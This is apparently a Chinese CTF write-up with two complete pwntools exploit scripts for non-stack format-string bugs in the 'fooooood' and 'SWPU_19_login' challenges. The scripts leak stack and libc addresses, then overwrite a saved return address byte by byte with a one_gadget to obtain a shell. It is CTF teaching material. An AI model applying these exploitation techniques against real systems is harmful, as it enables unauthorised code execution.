非栈上格式化字符串 例题

DAS 6月赛fooooood:

非栈上格式化字符串，但是只有3次有效输入机会。找跳板(1->2->3->value)，可以用两次输入把栈上i的值写成一个大值，从而实现多次输入；后面就是非栈上格式化字符串的标准打法，劫持ret既可以打rop，也可以打one_gadget。
exp:

from pwn import *
# pwntools setup for the fooooood challenge: debug-level I/O logging, amd64,
# and a tmux split used by the gdb.attach() call further down.
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])
# context(log_level='debug')

# io=remote("node4.buuoj.cn",25718)
# Local run against the challenge binary; the remote target stays commented out.
io=process("./pwn")
elf=ELF("./pwn")
# Every libc-relative constant below (the 240 offset, the one_gadget list)
# is tied to this exact libc build; a different build needs new values.
libc=ELF("./libc-2.23.so")

def sd(cc):
    """Wait for the "favourite food" prompt, then send ``cc`` plus a newline."""
    prompt = b"what's your favourite food: "
    io.sendlineafter(prompt, cc)


# Stage 1: the name prompt is answered with a NUL-terminated "/bin/sh" string.
io.recvuntil(b"Give me your name:")
payload=b"/bin/sh\x00"
io.sendline(payload)


# Stage 2: leak two pointers through the format-string bug in the food input:
# argument 11 (a stack address) and argument 9 (a libc address).
io.recvuntil(b"what's your favourite food: ")
payload="%11$p.%9$p"   # str payload; pwntools encodes it before sending
io.sendline(payload)

# Debugging aids: attach gdb in the tmux split and block until resumed.
# They stay active in this script, so the run stops here until continued.
gdb.attach(io)    
pause()

# Each leaked value is "0x" + 12 hex digits (14 chars) on amd64.
io.recvuntil(b"like ")
stack=int(io.recv(14),16)
stack0=stack-0xd0        # frame-relative base derived from the leak (offset found with gdb)
ret_addr=stack0-0x10     # saved return address slot targeted by fmt_off below
rr=stack0+0xe0           # NOTE: unused below
# canary=int(io.recv(18),16)
io.recvuntil(b".")
# libc base: the leaked value is presumably the return address into
# __libc_start_main, hence the hard-coded 240 offset (libc-2.23 specific).
libc_addr=int(io.recv(14),16)-240-libc.sym[b"__libc_start_main"]
print("stack: "+hex(stack))
print("stack0: "+hex(stack0))
print("libc_addr: "+hex(libc_addr))
# one_gadget offsets for libc-2.23; their constraints are listed at the end of the script.
one_gadget=[0x45226,0x4527a,0xf03a4,0xf1247]
shell=one_gadget[3]+libc_addr            # the [rsp+0x70]==NULL gadget
sys_addr=libc.sym[b"system"]+libc_addr   # NOTE: computed but never used

# Springboard write: "%Nc%11$hn" stores the low 16 bits of (stack0-0x24) into
# the slot argument 11 points at, so that argument 37 now refers to that
# address (per the write-up, the loop counter i — confirm in gdb).
off0=(stack0-0x24)&0xffff
payload = "%{}c%{}$hn".format(off0,11)
sd(payload)

sd('%100'+'c%37$hhn') # overwrite i (one byte, %hhn) with 100 to gain more input rounds

# off1=(off0+0xc+0x8)
off1=ret_addr   # NOTE: unused below; fmt_off is called with ret_addr directly

def fmt_off(addr,value):
    """Write the five low bytes of ``value`` to ``addr``, one byte per round.

    Each byte costs two inputs sent through ``sd``: "%Nc%11$hn" / "%Nc%11$hhn"
    first rewrites the pointer that argument 37 dereferences, then
    "%Nc%37$hhn" stores one byte through it. Ten inputs in total.

    NOTE(review): only the first round sets a 16-bit target (%hn); later
    rounds adjust just the low byte (%hhn), so the five target addresses
    must not cross a 256-byte boundary — not checked here. A zero value
    byte yields "%0c", which still prints one character, so writing 0x00
    this way would actually store 0x01.
    """

    # Round 0: point arg 37 at addr (low 16 bits), then store value's byte 0.
    payload = "%{}c%{}$hn".format(addr&0xffff,11)
    sd(payload)

    payload="%{}c%{}$hhn".format(value&0xff,37)
    sd(payload)

    # Rounds 1-4: bump the target's low byte to addr+1..addr+4 and store
    # bytes 1-4 of value. Byte 5 and above are left untouched.
    for i in range(4):
        payload = "%{}c%{}$hhn".format((addr+1+i)&0xff,11)
        sd(payload)
        payload="%{}c%{}$hhn".format((value>>((i+1)*8))&0xff,37)
        sd(payload)
    
fmt_off(ret_addr,shell) # byte-wise write of the one_gadget address over the saved return address

# Use up the remaining input rounds with harmless data so the function can
# return: i was set to 100 and 13 inputs were consumed (1 leak, 2 springboard
# writes, 10 in fmt_off), leaving 87 — presumably, verify against the binary's loop.
for i in range(87):
    io.sendline(b"1")


io.interactive()
    
# 0x45226 execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   rax == NULL

# 0x4527a execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   [rsp+0x30] == NULL

# 0xf03a4 execve("/bin/sh", rsp+0x50, environ)
# constraints:
#   [rsp+0x50] == NULL

# 0xf1247 execve("/bin/sh", rsp+0x70, environ)
# constraints:
#   [rsp+0x70] == NULL

SWPU_19_login

7/30复习一下
32位，劫持main函数的返回地址为one_gadget
exp:

from pwn import *
# context(log_level='debug',arch='x86',terminal=['tmux','splitw','-h'])
# pwntools setup: tmux split for a debugger; debug logging is left commented out above.
context(terminal=['tmux','splitw','-h'])

# Remote target from the write-up; the local process line stays commented out.
io=remote("node1.anna.nssctf.cn",28348)
# io=process("./login")
elf=ELF("./login")
# 32-bit challenge; the 241 offset and the 0x3cbf7 one_gadget below are tied to this libc build.
libc=ELF("./libc-2.27.so")

# gdb.attach(io)
# pause()

sh_addr=0x804b080   # NOTE: unused below
io.sendafter(b"name: \n",b"/bin/sh\x00")
io.recvuntil(b"word: \n")

# 6 15
# Format-string leak through the password field: argument 6 (a stack address)
# and argument 15 (a libc address); the "# 6 15" line records those indices.
payload=b"%6$p.%15$p"
io.send(payload)
io.recvuntil(b"password: ")
stack_addr=int(io.recv(10),16)   # "0x" + 8 hex digits (32-bit pointer)
io.recvuntil(b".")
# libc base from the leaked value, presumably the return address into
# __libc_start_main (hard-coded 241 offset for this libc-2.27 build).
leak_addr=int(io.recv(10),16)-241-libc.sym[b"__libc_start_main"]
ret_addr=stack_addr+0x24   # main's saved return address, per the write-up
shell=leak_addr+0x3cbf7    # one_gadget with constraint [esp+0x40]==NULL (listed at the end)

print("stack_addr: "+hex(stack_addr))
print("ret_addr: "+hex(ret_addr))
print("leak_addr: "+hex(leak_addr))
print("shell: "+hex(shell))

# Three byte-wise writes of ``shell`` over ret_addr. Each pair of inputs:
# "%Nc%22$hn" / "%Nc%22$hhn" sets the pointer that argument 59 dereferences,
# then "%Nc%59$hhn" stores one byte through it. Only the first pair sets a
# 16-bit target; the later ones change just its low byte (%hhn), so the
# three addresses must not cross a 256-byte boundary — not checked here.
# Only 3 bytes are written; the top byte is presumably already correct.
io.recvuntil(b"again!\n")
payload="%{}c%{}$hn".format(ret_addr&0xffff,22)
io.send(payload)

io.recvuntil(b"again!\n")
payload="%{}c%{}$hhn".format(shell&0xff,59)   # NOTE: a 0x00 byte would give "%0c" and store 1, not 0
io.send(payload)


io.recvuntil(b"again!\n")
payload="%{}c%{}$hhn".format((ret_addr+1)&0xff,22)
io.send(payload)

io.recvuntil(b"again!\n")
payload="%{}c%{}$hhn".format((shell>>8)&0xff,59)
io.send(payload)


io.recvuntil(b"again!\n")
payload="%{}c%{}$hhn".format((ret_addr+2)&0xff,22)
io.send(payload)

io.recvuntil(b"again!\n")
payload="%{}c%{}$hhn".format((shell>>16)&0xff,59)
io.send(payload)


# Final input: presumably the expected password that ends the retry loop
# so main returns into the overwritten address — confirm against the binary.
io.recvuntil(b"again!\n")
io.send(b"wllmmllw")

io.interactive()

# 0x3cbea execve("/bin/sh", esp+0x34, environ)
# constraints:
#   esi is the GOT address of libc
#   [esp+0x34] == NULL

# 0x3cbec execve("/bin/sh", esp+0x38, environ)
# constraints:
#   esi is the GOT address of libc
#   [esp+0x38] == NULL

# 0x3cbf0 execve("/bin/sh", esp+0x3c, environ)
# constraints:
#   esi is the GOT address of libc
#   [esp+0x3c] == NULL

# 0x3cbf7 execve("/bin/sh", esp+0x40, environ)
# constraints:
#   esi is the GOT address of libc
#   [esp+0x40] == NULL

# 0x6729f execl("/bin/sh", eax)
# constraints:
#   esi is the GOT address of libc
#   eax == NULL

# 0x672a0 execl("/bin/sh", [esp])
# constraints:
#   esi is the GOT address of libc
#   [esp] == NULL

# 0x13573e execl("/bin/sh", eax)
# constraints:
#   ebx is the GOT address of libc
#   eax == NULL

# 0x13573f execl("/bin/sh", [esp])
# constraints:
#   ebx is the GOT address of libc
#   [esp] == NULL